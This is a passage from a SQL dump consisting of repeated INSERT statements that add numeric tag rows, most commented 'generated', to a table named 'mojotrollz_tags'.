`table`, `type`, `value`, `comment`) VALUES (8548, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8550, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8550, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8551, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8551, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8553, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8553, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8554, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8554, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8555, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8555, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8556, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8556, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8557, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8557, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8558, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8558, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8560, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8560, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8561, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8561, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8562, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8562, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8563, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8563, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8564, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8564, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8565, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8565, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8566, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8566, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8567, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8567, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8567, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8576, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8576, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8578, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8579, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8579, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8580, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8581, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8582, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8582, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8582, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8582, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8582, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8583, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8583, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8584, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8584, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8585, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8586, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8586, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8587, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8587, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8588, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8588, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8596, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8596, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8597, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8597, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8598, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8598, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8600, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8600, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8601, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8601, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8602, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8602, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8603, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8603, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8605, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8605, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8606, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8606, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8607, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8607, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8608, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8609, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8609, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8610, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8610, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8611, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8612, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8615, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8616, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8617, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8617, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8636, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8636, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8637, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8637, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8656, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8657, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8658, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8659, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8659, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8660, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8660, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8661, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8661, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8662, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8662, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8662, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8664, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8664, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8665, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8665, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8666, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8666, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8667, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8667, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8668, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8669, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8669, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8670, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8670, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8671, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8671, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8672, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8672, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8672, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8672, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8672, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8673, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8673, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8673, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8673, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8673, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8673, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8674, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8674, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8675, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8675, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8678, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8678, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8679, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8679, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8680, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8681, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8681, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8696, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8696, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8696, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8716, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8716, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8717, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8717, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8718, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8718, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8719, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8719, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8720, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8720, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8721, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8721, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8721, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8721, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8721, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8722, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8722, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8723, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8723, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8724, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8724, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8724, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8724, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8724, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8724, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8736, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8736, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8737, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8737, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8738, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8738, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8738, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8738, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8738, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8756, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8756, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8757, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8757, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8758, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8758, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8759, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8759, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8760, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8760, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8761, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8761, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8762, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8762, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8763, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8763, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8764, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8764, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8766, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8766, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8767, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8767, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8767, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8776, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8816, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8816, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8836, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8837, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8837, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8856, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8856, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8876, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8877, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8878, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8878, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8879, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8879, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8881, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8881, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8882, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8882, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8883, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8883, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8884, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8884, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8885, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8885, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8886, 1, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8886, 1, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8886, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8887, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8887, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8888, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8888, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8889, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8889, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8889, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8890, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8890, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8890, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8891, 1, 1, 230, 'generated'); INSERT INTO 